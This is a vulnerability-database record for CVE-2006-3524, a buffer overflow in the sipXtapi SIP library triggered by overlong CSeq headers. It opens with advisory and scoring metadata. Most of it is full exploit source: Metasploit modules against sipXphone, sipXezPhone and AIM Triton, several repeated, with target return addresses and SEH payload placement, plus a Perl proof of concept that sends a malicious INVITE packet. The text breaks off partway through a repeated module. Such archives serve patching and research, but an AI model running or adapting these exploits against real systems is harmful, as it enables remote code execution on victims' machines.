The Session Initiation Protocol (SIP) is a signaling protocol for a variety of uses, including instant messanging and Voice over Internet Protocol. sipXtapi is a client library for SIP-based user agents. It is included in Pingtel and AIM Triton products.
Problem
sipXtapi versions built prior to March 24, 2006 are affected by a buffer overflow vulnerability when processing long CSeq headers. This vulnerability could allow a remote attacker to execute arbitrary commands.
Resolution
A patch is available within the sipXtapi source tree. Compile from the latest sources or install the latest version of Pingtel or AIM Triton products.
Exploit works on sipXtapi versions WIN32_2006-02-01b and WIN32_2006-03-10.
Platforms
Windows
{"enchantments": {"score": {"value": 8.6, "vector": "NONE", "modified": "2016-10-03T15:02:00", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-3524"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82931", "PACKETSTORM:83094", "PACKETSTORM:83080"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SIP/AIM_TRITON_CSEQ", "MSF:EXPLOIT/WINDOWS/SIP/SIPXPHONE_CSEQ", "MSF:EXPLOIT/WINDOWS/SIP/SIPXEZPHONE_CSEQ"]}, {"type": "saint", "idList": ["SAINT:B1EE85BA43D9F6D0F7A422216D634076", "SAINT:66F2928947F2B882DE0E6AFE81C76D8A"]}, {"type": "exploitdb", "idList": ["EDB-ID:16352", "EDB-ID:16351", "EDB-ID:2000", "EDB-ID:16353"]}, {"type": "osvdb", "idList": ["OSVDB:27122"]}, {"type": "nessus", "idList": ["SIPXTAPI_CSEQ_OVERFLOW.NASL"]}], "modified": "2016-10-03T15:02:00", "rev": 2}, "vulnersScore": 8.6}, "reporter": "SAINT Corporation", "id": "SAINT:069D047A68E7FD9075AEACBBF45C1581", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "published": "2006-07-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "modified": "2006-07-17T00:00:00", "references": [], "cvelist": ["CVE-2006-3524"], "description": "Added: 07/17/2006 \nCVE: [CVE-2006-3524](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3524>) \nBID: [18906](<http://www.securityfocus.com/bid/18906>) \nOSVDB: [27122](<http://www.osvdb.org/27122>) \n\n\n### Background\n\nThe [Session Initiation Protocol](<http://www.cs.columbia.edu/sip/>) (SIP) is a signaling protocol for a variety of uses, including instant messanging and Voice over Internet Protocol. [sipXtapi](<http://www.sipfoundry.org/sipxtapi.html>) is a client library for SIP-based user agents. It is included in [Pingtel](<http://www.pingtel.com/>) and [AIM Triton](<http://www.aim.com>) products. \n\n### Problem\n\nsipXtapi versions built prior to March 24, 2006 are affected by a buffer overflow vulnerability when processing long CSeq headers. This vulnerability could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nA patch is available within the [sipXtapi](<http://www.sipfoundry.org/sipxtapi.html>) source tree. Compile from the latest sources or install the latest version of [Pingtel](<http://www.pingtel.com>) or [AIM Triton](<http://www.aim.com>) products. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0160.html> \n\n\n### Limitations\n\nExploit works on sipXtapi versions WIN32_2006-02-01b and WIN32_2006-03-10. \n\n### Platforms\n\nWindows \n \n\n", "type": "saint", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/sipxtapi_cseq", "lastseen": "2016-10-03T15:02:00", "edition": 1, "title": "sipXtapi Cseq header buffer overflow", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:27:22", "description": "Buffer overflow in SIPfoundry sipXtapi released before 20060324 allows remote attackers to execute arbitrary code via a long CSeq field value in an INVITE message.", "edition": 4, "cvss3": {}, "published": "2006-07-12T00:05:00", "title": "CVE-2006-3524", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2006-3524"], "modified": "2018-10-18T16:47:00", "cpe": ["cpe:/a:sipfoundry:sipxtapi:*"], "id": "CVE-2006-3524", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3524", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sipfoundry:sipxtapi:*:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "description": "Added: 07/17/2006 \nCVE: [CVE-2006-3524](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3524>) \nBID: [18906](<http://www.securityfocus.com/bid/18906>) \nOSVDB: [27122](<http://www.osvdb.org/27122>) \n\n\n### Background\n\nThe [Session Initiation Protocol](<http://www.cs.columbia.edu/sip/>) (SIP) is a signaling protocol for a variety of uses, including instant messanging and Voice over Internet Protocol. [sipXtapi](<http://www.sipfoundry.org/sipxtapi.html>) is a client library for SIP-based user agents. It is included in [Pingtel](<http://www.pingtel.com/>) and [AIM Triton](<http://www.aim.com>) products. \n\n### Problem\n\nsipXtapi versions built prior to March 24, 2006 are affected by a buffer overflow vulnerability when processing long CSeq headers. This vulnerability could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nA patch is available within the [sipXtapi](<http://www.sipfoundry.org/sipxtapi.html>) source tree. Compile from the latest sources or install the latest version of [Pingtel](<http://www.pingtel.com>) or [AIM Triton](<http://www.aim.com>) products. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0160.html> \n\n\n### Limitations\n\nExploit works on sipXtapi versions WIN32_2006-02-01b and WIN32_2006-03-10. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2006-07-17T00:00:00", "published": "2006-07-17T00:00:00", "id": "SAINT:66F2928947F2B882DE0E6AFE81C76D8A", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/sipxtapi_cseq", "title": "sipXtapi Cseq header buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:19:48", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "edition": 2, "description": "Added: 07/17/2006 \nCVE: [CVE-2006-3524](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3524>) \nBID: [18906](<http://www.securityfocus.com/bid/18906>) \nOSVDB: [27122](<http://www.osvdb.org/27122>) \n\n\n### Background\n\nThe [Session Initiation Protocol](<http://www.cs.columbia.edu/sip/>) (SIP) is a signaling protocol for a variety of uses, including instant messanging and Voice over Internet Protocol. [sipXtapi](<http://www.sipfoundry.org/sipxtapi.html>) is a client library for SIP-based user agents. It is included in [Pingtel](<http://www.pingtel.com/>) and [AIM Triton](<http://www.aim.com>) products. \n\n### Problem\n\nsipXtapi versions built prior to March 24, 2006 are affected by a buffer overflow vulnerability when processing long CSeq headers. This vulnerability could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nA patch is available within the [sipXtapi](<http://www.sipfoundry.org/sipxtapi.html>) source tree. Compile from the latest sources or install the latest version of [Pingtel](<http://www.pingtel.com>) or [AIM Triton](<http://www.aim.com>) products. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0160.html> \n\n\n### Limitations\n\nExploit works on sipXtapi versions WIN32_2006-02-01b and WIN32_2006-03-10. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2006-07-17T00:00:00", "published": "2006-07-17T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/sipxtapi_cseq", "id": "SAINT:B1EE85BA43D9F6D0F7A422216D634076", "title": "sipXtapi Cseq header buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:02", "description": "", "published": "2009-10-30T00:00:00", "type": "packetstorm", "title": "SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2009-10-30T00:00:00", "id": "PACKETSTORM:82931", "href": "https://packetstormsecurity.com/files/82931/SIPfoundry-sipXphone-2.6.0.27-CSeq-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Udp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in SIPfoundry's \nsipXphone 2.6.0.27. By sending an overly long CSeq value, \na remote attacker could overflow a buffer and execute \narbitrary code on the system with the privileges of \nthe affected application. \n}, \n'Author' => 'MC', \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2006-3524'], \n['OSVDB', '27122'], \n['BID', '18906'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 400, \n'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ], \n], \n'Privileged' => false, \n'DisclosureDate' => 'July 10 2006', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(5060) \n], self) \n \nend \n \ndef exploit \nconnect_udp \n \nuser = rand_text_english(2, payload_badchars) \nport = rand(65535).to_s \nfiller = rand_text_english(212, payload_badchars) \nseh = generate_seh_payload(target.ret) \nfiller[204, seh.length] = seh \n \nsploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\" \nsploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\" \nsploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\" \nsploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\" \nsploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\" \nsploit << \"CSeq: \" + filler + \"\\r\\n\" \nsploit << \"Max-Forwards: 20\" + \"\\r\\n\" \nsploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\" \n \nprint_status(\"Trying target #{target.name}...\") \n \nudp_sock.put(sploit) \n \nhandler \ndisconnect_udp \n \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82931/sipxphone_cseq.rb.txt"}, {"lastseen": "2016-12-05T22:21:07", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "AIM Triton 1.0.4 CSeq Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83080", "href": "https://packetstormsecurity.com/files/83080/AIM-Triton-1.0.4-CSeq-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Udp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'AIM Triton 1.0.4 CSeq Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in AOL's AIM \nTriton 1.0.4. By sending an overly long CSeq value, \na remote attacker could overflow a buffer and execute \narbitrary code on the system with the privileges of \nthe affected application. \n}, \n'Author' => 'MC', \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2006-3524'], \n['OSVDB', '27122' ], \n['BID', '18906'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Payload' => \n{ \n'Space' => 400, \n'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll \n], \n'Privileged' => false, \n'DisclosureDate' => 'July 10 2006', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(5061) \n], self) \n \nend \n \ndef exploit \nconnect_udp \n \nuser = rand_text_english(2, payload_badchars) \nport = rand(65535).to_s \nfiller = rand_text_english(792, payload_badchars) \nseh = generate_seh_payload(target.ret) \nfiller[780, seh.length] = seh \n \nsploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\" \nsploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\" \nsploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\" \nsploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\" \nsploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\" \nsploit << \"CSeq: \" + filler + \"\\r\\n\" \nsploit << \"Max-Forwards: 20\" + \"\\r\\n\" \nsploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\" \n \nprint_status(\"Trying target #{target.name}...\") \n \nudp_sock.put(sploit) \n \nhandler \ndisconnect_udp \n \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83080/aim_triton_cseq.rb.txt"}, {"lastseen": "2016-12-05T22:11:33", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83094", "href": "https://packetstormsecurity.com/files/83094/SIPfoundry-sipXezPhone-0.35a-CSeq-Field-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Udp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in SIPfoundry's \nsipXezPhone version 0.35a. By sending an long CSeq header, \na remote attacker could overflow a buffer and execute \narbitrary code on the system with the privileges of \nthe affected application. \n}, \n'Author' => 'MC', \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2006-3524'], \n['OSVDB', '27122'], \n['BID', '18906'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 400, \n'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n \n'Targets' => \n[ \n['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ], \n], \n \n'Privileged' => false, \n \n'DisclosureDate' => 'July 10 2006', \n \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(5060) \n], self.class) \nend \n \ndef exploit \nconnect_udp \n \nprint_status(\"Trying target #{target.name}...\") \n \nuser = rand_text_english(2, payload_badchars) \nport = rand(65535).to_s \nfiller = rand_text_english(260, payload_badchars) \nseh = generate_seh_payload(target.ret) \nfiller[252, seh.length] = seh \n \nsploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\" \nsploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\" \nsploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\" \nsploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\" \nsploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\" \nsploit << \"CSeq: \" + filler + \"\\r\\n\" \nsploit << \"Max-Forwards: 20\" + \"\\r\\n\" \nsploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\" \n \nudp_sock.put(sploit) \n \nhandler \ndisconnect_udp \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83094/sipxezphone_cseq.rb.txt"}], "exploitdb": [{"lastseen": "2016-01-31T15:19:08", "description": "SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit PoC. CVE-2006-3524. Dos exploit for hardware platform", "published": "2006-07-10T00:00:00", "type": "exploitdb", "title": "SIPfoundry sipXtapi CSeq Remote Buffer Overflow Exploit PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2006-07-10T00:00:00", "id": "EDB-ID:2000", "href": "https://www.exploit-db.com/exploits/2000/", "sourceData": "#!/usr/bin/perl\n# PoC Exploit By mthumann@ernw.de\n# Remote Buffer Overflow in sipXtapi\n\nuse IO::Socket;\n#use strict;\n\n\nprint \"sipXtapi Exploit by Michael Thumann \\n\\n\";\n\nif (not $ARGV[0]) {\n print \"Usage: sipx.pl <host>\\n\";\nexit;}\n\n$target=$ARGV[0];\nmy $source =\"127.0.0.1\";\nmy $target_port = 5060;\nmy $user =\"bad\";\nmy $eip=\"\\x41\\x41\\x41\\x41\";\nmy $cseq =\n\"\\x31\\x31\\x35\\x37\\x39\\x32\\x30\\x38\".\n\"\\x39\\x32\\x33\\x37\\x33\\x31\\x36\\x31\".\n\"\\x39\\x35\\x34\\x32\\x33\\x35\\x37\\x30\".\n$eip;\nmy $packet =<<END;\nINVITE sip:user\\@$source SIP/2.0\\r\nTo: <sip:$target:$target_port>\\r\nVia: SIP/2.0/UDP $target:3277\\r\nFrom: \"moz\"<sip:$target:3277>\\r\nCall-ID: 3121$target\\r\nCSeq: $cseq\\r\nMax-Forwards: 70\\r\nContact: <sip:$source:5059>\\r\n\\r\nEND\n\nprint \"Sending Packet to: \" . $target . \"\\n\\n\";\nsocket(PING, PF_INET, SOCK_DGRAM, getprotobyname(\"udp\"));\nmy $ipaddr = inet_aton($target);\nmy $sendto = sockaddr_in($target_port,$ipaddr);\nsend(PING, $packet, 0, $sendto) == length($packet) or die \"cannot send to $target : $target_port : $!\\n\";\nprint \"Done.\\n\";\n\n#EoF\n\n# milw0rm.com [2006-07-10]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2000/"}, {"lastseen": "2016-02-01T23:40:32", "description": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow. CVE-2006-3524. Remote exploit for windows platform", "published": "2010-06-15T00:00:00", "type": "exploitdb", "title": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2010-06-15T00:00:00", "id": "EDB-ID:16351", "href": "https://www.exploit-db.com/exploits/16351/", "sourceData": "##\r\n# $Id: sipxezphone_cseq.rb 9525 2010-06-15 07:18:08Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in SIPfoundry's\r\n\t\t\t\tsipXezPhone version 0.35a. By sending an long CSeq header,\r\n\t\t\t\ta remote attacker could overflow a buffer and execute\r\n\t\t\t\tarbitrary code on the system with the privileges of\r\n\t\t\t\tthe affected application.\r\n\t\t\t},\r\n\t\t\t'Author' => 'MC',\r\n\t\t\t'Version' => '$Revision: 9525 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-3524'],\r\n\t\t\t\t\t['OSVDB', '27122'],\r\n\t\t\t\t\t['BID', '18906'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 400,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ],\r\n\t\t\t\t],\r\n\r\n\t\t\t'Privileged' => false,\r\n\r\n\t\t\t'DisclosureDate' => 'Jul 10 2006',\r\n\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(5060)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tuser = rand_text_english(2, payload_badchars)\r\n\t\tport = rand(65535).to_s\r\n\t\tfiller = rand_text_english(260, payload_badchars)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\tfiller[252, seh.length] = seh\r\n\r\n\t\tsploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\"\r\n\t\tsploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\"\r\n\t\tsploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\"\r\n\t\tsploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\"\r\n\t\tsploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\"\r\n\t\tsploit << \"CSeq: \" + filler + \"\\r\\n\"\r\n\t\tsploit << \"Max-Forwards: 20\" + \"\\r\\n\"\r\n\t\tsploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\"\r\n\r\n\t\tudp_sock.put(sploit)\r\n\r\n\t\thandler\r\n\t\tdisconnect_udp\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16351/"}, {"lastseen": "2016-02-01T23:40:42", "description": "SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow. CVE-2006-3524. Remote exploit for windows platform", "published": "2010-06-15T00:00:00", "type": "exploitdb", "title": "SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2010-06-15T00:00:00", "id": "EDB-ID:16352", "href": "https://www.exploit-db.com/exploits/16352/", "sourceData": "##\r\n# $Id: sipxphone_cseq.rb 9525 2010-06-15 07:18:08Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in SIPfoundry's\r\n\t\t\t\tsipXphone 2.6.0.27. By sending an overly long CSeq value,\r\n\t\t\t\ta remote attacker could overflow a buffer and execute\r\n\t\t\t\tarbitrary code on the system with the privileges of\r\n\t\t\t\tthe affected application.\r\n\t\t\t},\r\n\t\t\t'Author' => 'MC',\r\n\t\t\t'Version' => '$Revision: 9525 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2006-3524' ],\r\n\t\t\t\t\t[ 'OSVDB', '27122' ],\r\n\t\t\t\t\t[ 'BID', '18906' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 400,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jul 10 2006',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(5060)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tuser = rand_text_english(2, payload_badchars)\r\n\t\tport = rand(65535).to_s\r\n\t\tfiller = rand_text_english(212, payload_badchars)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\tfiller[204, seh.length] = seh\r\n\r\n\t\tsploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\"\r\n\t\tsploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\"\r\n\t\tsploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\"\r\n\t\tsploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\"\r\n\t\tsploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\"\r\n\t\tsploit << \"CSeq: \" + filler + \"\\r\\n\"\r\n\t\tsploit << \"Max-Forwards: 20\" + \"\\r\\n\"\r\n\t\tsploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tudp_sock.put(sploit)\r\n\r\n\t\thandler\r\n\t\tdisconnect_udp\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16352/"}, {"lastseen": "2016-02-01T23:40:49", "description": "AIM Triton 1.0.4 CSeq Buffer Overflow. CVE-2006-3524. Remote exploit for windows platform", "published": "2010-06-15T00:00:00", "type": "exploitdb", "title": "AIM Triton 1.0.4 CSeq Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2010-06-15T00:00:00", "id": "EDB-ID:16353", "href": "https://www.exploit-db.com/exploits/16353/", "sourceData": "##\r\n# $Id: aim_triton_cseq.rb 9525 2010-06-15 07:18:08Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'AIM Triton 1.0.4 CSeq Buffer 